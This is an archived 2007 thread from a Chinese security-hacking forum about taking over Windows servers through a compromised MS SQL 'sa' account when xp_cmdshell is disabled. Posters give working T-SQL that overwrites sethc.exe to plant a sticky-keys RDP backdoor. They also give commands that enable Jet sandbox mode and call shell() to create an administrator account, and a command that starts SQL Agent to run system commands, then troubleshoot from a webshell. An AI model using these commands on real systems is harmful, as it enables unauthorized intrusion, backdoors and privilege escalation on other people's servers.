邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]sa 无xp_cmdshell下取权限又一简单方法 [查看完整版本]

charley008 2007-11-30 15:55

[讨论]sa 无xp_cmdshell下取权限又一简单方法

文章作者：charley008
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
（很多服务器都把'wscript.shell'给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。
上网找了些资料，得到下面方法：
复制文件：
[code]declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';[/code]

[code]declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';[/code]

成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。
PS：高手能否把Shell.Application 这个也调用呢？希望多多指点

pub!1c 2007-12-2 23:27

SA 权限还有两个执行系统指令的方法!
1: 沙盒模式。
2:使用SQLSERVERAGENT的JOB来运行系统命令,请先使用下列语句启动SQLSERVERAGENT:
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

详细利用方法google之!

charley008 2007-12-7 17:05

1: 沙盒模式
好像2003我 试了没成功过

heizihui 2007-12-7 18:01

是啊

沙盒我也没成功过~

在webshell下，连接MSSQL，用SYSADMIN帐号，maste库。都没成功！
郁闷！
不知道什么原因



[Microsoft][ODBC SQL Server Driver][SQL Server]无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。

这个提示是什么意思呢？

xpsql70.dll 没了？

heizihui 2007-12-7 18:10

晕哦~~
执行到楼上的第2句出现
[Microsoft][ODBC SQL Server Driver][SQL Server]必须声明变量 '@o'。 ？
不能用呢~

我用&把 3句连接起来执行出现这

[Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '&' 附近有语法错误。


不能外连，只能在webshell下执行SQL命令呀

怎么写完整？

heizihui 2007-12-7 20:11

晕死了~~

又搞了几小时

发现那服务器的人居然把net.exe net1.exe都用CMD.exe替换掉了。真BT啊~~

第3方软件是突破口了~~~

ziv 2007-12-8 01:41

SA沙盒从木成功过. [s:302]

zhuziliu 2007-12-8 12:09

首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test test /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')

呼，成功了一次。

poc 2007-12-10 19:00

TO ring04h
那个使用SQLSERVERAGENT的JOB来运行系统命令
貌似要知道SQL服务器的名字。
用什么方法才能知道呢？
[s:270]

charley008 2007-12-11 07:31

[quote]引用第4楼heizihui于2007-12-07 18:10发表的 :
晕哦~~
执行到楼上的第2句出现
[Microsoft][ODBC SQL Server Driver][SQL Server]必须声明变量 '@o'。 ？
不能用呢~

.......[/quote]
把第一第二句放在一行。不要分开

唐不狐 2008-3-8 10:55

xxxx.cpp这个错误是不能用沙盘的。cmd被删除或重新分配权限，导致system无执行权限。
方法：重新上传一个cmd用oa调新的cmd执行。路径任意

heekey 2008-3-14 15:27

那对于客户端的xp_cmdshell
楼主有没有什么好办法

查看完整版本: [讨论]sa 无xp_cmdshell下取权限又一简单方法

© 1999-2008 EvilOctal Security Team